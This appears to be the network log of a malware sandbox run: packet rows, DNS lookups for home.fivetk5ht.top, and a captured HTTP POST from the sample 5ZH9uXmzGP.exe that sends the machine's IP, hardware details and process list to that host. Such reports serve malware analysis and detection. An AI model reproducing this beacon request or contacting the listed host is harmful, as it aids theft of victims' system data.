Dec 20, 2024 16:44:47.845221043 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845247030 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845257044 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845266104 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845277071 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845346928 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845478058 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845489025 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845568895 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845577955 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845587969 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845601082 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845609903 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845619917 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.845630884 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.846065998 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.846097946 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.846797943 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.846807957 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.846818924 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.846831083 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.846842051 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.889458895 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:47.889960051 CET     80  49733  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.092175961 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.211914062 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.212011099 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.303504944 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.423271894 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423362017 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423374891 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423373938 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.423384905 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423413992 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.423433065 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423439026 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.423491955 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.423501015 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423574924 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.423657894 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423671961 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423681974 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423692942 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.423712015 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.423724890 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.423732996 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.543025017 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.543088913 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.543098927 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.543114901 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.543116093 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.543170929 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.543327093 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.543337107 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.543368101 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.543401957 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.586154938 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.586324930 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.705818892 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.705928087 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:48.749875069 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.869833946 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:48.869921923 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.073862076 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.073997974 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.197855949 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.198105097 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.198216915 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.318070889 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318084955 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318186998 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.318213940 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318226099 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318267107 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.318304062 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.318362951 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318373919 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318392038 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318402052 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318411112 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318455935 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.318500042 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.318511963 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318521976 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318598032 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.318653107 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318661928 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318730116 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.318861008 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318871975 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318958044 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318969965 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.318977118 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.318989038 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.319189072 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.319199085 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.319278002 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.319288015 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.319427013 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.319437981 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.319551945 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.320019960 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.438085079 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.438209057 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.438520908 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.438600063 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.438865900 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.438944101 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.438998938 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.439147949 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.439157963 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.439388037 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.439675093 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.439749956 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.439802885 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.439858913 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.439870119 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.439929008 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.439930916 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.440042019 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440063953 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440088987 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.440114975 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.440150023 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440226078 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.440263987 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440274954 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440299988 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440310001 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.440345049 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.440464020 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440521002 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.440556049 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440567017 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440589905 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440603018 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.440622091 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.440654993 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440665007 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440745115 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440840960 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440887928 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440898895 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.440972090 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441010952 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441129923 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441229105 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441240072 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441344023 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441353083 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441364050 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441430092 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441440105 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441454887 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441466093 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441668987 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441678047 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441689014 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441699028 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441706896 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441715956 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441926003 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441935062 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441945076 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441955090 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441963911 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.441973925 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.489793062 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.489897013 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.490330935 CET  49734     80  192.168.2.5      185.121.15.192
Dec 20, 2024 16:44:49.559298992 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.559385061 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.559526920 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.559539080 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.559622049 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.559632063 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.559673071 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.559812069 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.559822083 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.560626984 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.560931921 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561064959 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561074972 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561094999 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561366081 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561374903 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561532974 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561589003 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561599016 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561635017 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561691999 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561804056 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561814070 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561860085 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561932087 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.561975956 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562062979 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562072992 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562129021 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562139034 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562149048 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562160969 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562354088 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562364101 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562372923 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562381983 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562536001 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562546015 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562553883 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562565088 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562573910 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562632084 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562640905 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562750101 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562760115 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.562769890 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563021898 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563031912 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563040018 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563049078 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563059092 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563066959 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563108921 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563193083 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563201904 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563400030 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563410044 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563417912 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563426971 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563436985 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563446045 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563455105 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.563463926 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.609581947 CET     80  49734  185.121.15.192   192.168.2.5
Dec 20, 2024 16:44:49.609884977 CET     80  49734  185.121.15.192   192.168.2.5
                                                          Dec 20, 2024 16:44:49.830032110 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.949678898 CET8049742185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:49.949788094 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:49.954622984 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:50.074199915 CET8049742185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:51.228024006 CET8049742185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:51.228595972 CET8049742185.121.15.192192.168.2.5
                                                          Dec 20, 2024 16:44:51.228671074 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:51.229572058 CET4974280192.168.2.5185.121.15.192
                                                          Dec 20, 2024 16:44:51.349414110 CET8049742185.121.15.192192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:44:39.846967936 CET | 64323 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:39.847059011 CET | 64323 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:39.984116077 CET | 53 | 64323 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 16:44:40.140192032 CET | 53 | 64323 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 16:44:44.474179029 CET | 52493 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:44.474304914 CET | 52493 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:44.611670971 CET | 53 | 52493 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 16:44:44.611685038 CET | 53 | 52493 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 16:44:46.229114056 CET | 52495 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:46.229202986 CET | 52495 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:46.367233992 CET | 53 | 52495 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 16:44:46.367263079 CET | 53 | 52495 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 16:44:47.953042984 CET | 52497 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:47.953113079 CET | 52497 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:48.091058969 CET | 53 | 52497 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 16:44:48.091109037 CET | 53 | 52497 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 16:44:49.691237926 CET | 52499 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:49.691332102 CET | 52499 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 16:44:49.828900099 CET | 53 | 52499 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 16:44:49.828921080 CET | 53 | 52499 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 16:44:39.846967936 CET | 192.168.2.5 | 1.1.1.1 | 0xeee8 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:39.847059011 CET | 192.168.2.5 | 1.1.1.1 | 0x5d39 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 20, 2024 16:44:44.474179029 CET | 192.168.2.5 | 1.1.1.1 | 0x730 | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:44.474304914 CET | 192.168.2.5 | 1.1.1.1 | 0xec6d | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
Dec 20, 2024 16:44:46.229114056 CET | 192.168.2.5 | 1.1.1.1 | 0xa9bf | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:46.229202986 CET | 192.168.2.5 | 1.1.1.1 | 0xce8c | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
Dec 20, 2024 16:44:47.953042984 CET | 192.168.2.5 | 1.1.1.1 | 0x7568 | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:47.953113079 CET | 192.168.2.5 | 1.1.1.1 | 0xc384 | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
Dec 20, 2024 16:44:49.691237926 CET | 192.168.2.5 | 1.1.1.1 | 0xbf5d | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:49.691332102 CET | 192.168.2.5 | 1.1.1.1 | 0x95f8 | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 16:44:40.140192032 CET | 1.1.1.1 | 192.168.2.5 | 0xeee8 | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:40.140192032 CET | 1.1.1.1 | 192.168.2.5 | 0xeee8 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:44.611670971 CET | 1.1.1.1 | 192.168.2.5 | 0x730 | No error (0) | home.fivetk5ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:46.367233992 CET | 1.1.1.1 | 192.168.2.5 | 0xa9bf | No error (0) | home.fivetk5ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:48.091109037 CET | 1.1.1.1 | 192.168.2.5 | 0x7568 | No error (0) | home.fivetk5ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:49.828900099 CET | 1.1.1.1 | 192.168.2.5 | 0xbf5d | No error (0) | home.fivetk5ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
• httpbin.org
• home.fivetk5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49726 | 185.121.15.192 | 80 | 3148 | C:\Users\user\Desktop\5ZH9uXmzGP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:44:44.734338045 CET | 12360 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
Host: home.fivetk5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 500630
Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
